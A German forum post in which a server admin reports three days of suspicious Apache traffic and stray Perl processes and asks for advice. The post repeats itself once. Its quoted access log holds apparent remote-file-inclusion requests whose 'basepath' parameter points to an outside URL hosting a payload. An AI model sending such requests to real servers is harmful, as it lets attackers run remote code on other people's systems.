afroasiate
Registered User
Hallo,
hab seit 3 Tagen folgendes Problem:
Irgend jemand versucht scheinbar meinen Server zum absturzt zubringen.
Es entsteht ein hoher Incoming Traffic über irgend welche anfragen an den Apache.
Anbei seht Ihr ein Diagramm vom Incoming Traffic.
Das führt zwar nicht zu einer hohen CPU Last aber es entstehen mit der Zeit eine ganze reihe von Prozesse die von user wwrun stammen und bei dennen es sich scheinbar um ein perl script handelt es es aber immer nur ganz kurz läuft und gleich wieder abbricht.
Nun entwickelt sich das schon seit 3 Tagen folgendermaßen.
Samstag ab 11:30 -24 Uhr nach einem Server Neustart war Ruhe
Sonntag 15 - 18 Uhr nachdem ich den Apache Dienst für 30 min abgeschaltet hatte war Ruhe
Montag 14:30 14:40 hab ich den Apache für 30 min. abgeschaltet, danach Ruhe.
Hier der Auszug aus der /var/log/apache2/access_log
Hat jemand einen Tip für mich?
cu
afroasiate
hab seit 3 Tagen folgendes Problem:
Irgend jemand versucht scheinbar meinen Server zum absturzt zubringen.
Es entsteht ein hoher Incoming Traffic über irgend welche anfragen an den Apache.
Anbei seht Ihr ein Diagramm vom Incoming Traffic.
Das führt zwar nicht zu einer hohen CPU Last aber es entstehen mit der Zeit eine ganze reihe von Prozesse die von user wwrun stammen und bei dennen es sich scheinbar um ein perl script handelt es es aber immer nur ganz kurz läuft und gleich wieder abbricht.
Nun entwickelt sich das schon seit 3 Tagen folgendermaßen.
Samstag ab 11:30 -24 Uhr nach einem Server Neustart war Ruhe
Sonntag 15 - 18 Uhr nachdem ich den Apache Dienst für 30 min abgeschaltet hatte war Ruhe
Montag 14:30 14:40 hab ich den Apache für 30 min. abgeschaltet, danach Ruhe.
Hier der Auszug aus der /var/log/apache2/access_log
Code:
127.0.0.1 - - [03/Dec/2007:14:27:30 +0100] "GET /?basepath=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f HTTP/1.1" 200 831 "-" "libwww-perl/5.803"
127.0.0.1 - - [03/Dec/2007:14:27:34 +0100] "GET /?basepath=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f%3f HTTP/1.1" 200 831 "-" "libwww-perl/5.803"
127.0.0.1 - - [03/Dec/2007:14:27:49 +0100] "GET / HTTP/1.1" 200 831 "-" "libwww-perl/5.803"
127.0.0.1 - - [03/Dec/2007:14:27:50 +0100] "GET / HTTP/1.1" 200 831 "-" "libwww-perl/5.803"
Hat jemand einen Tip für mich?
cu
afroasiate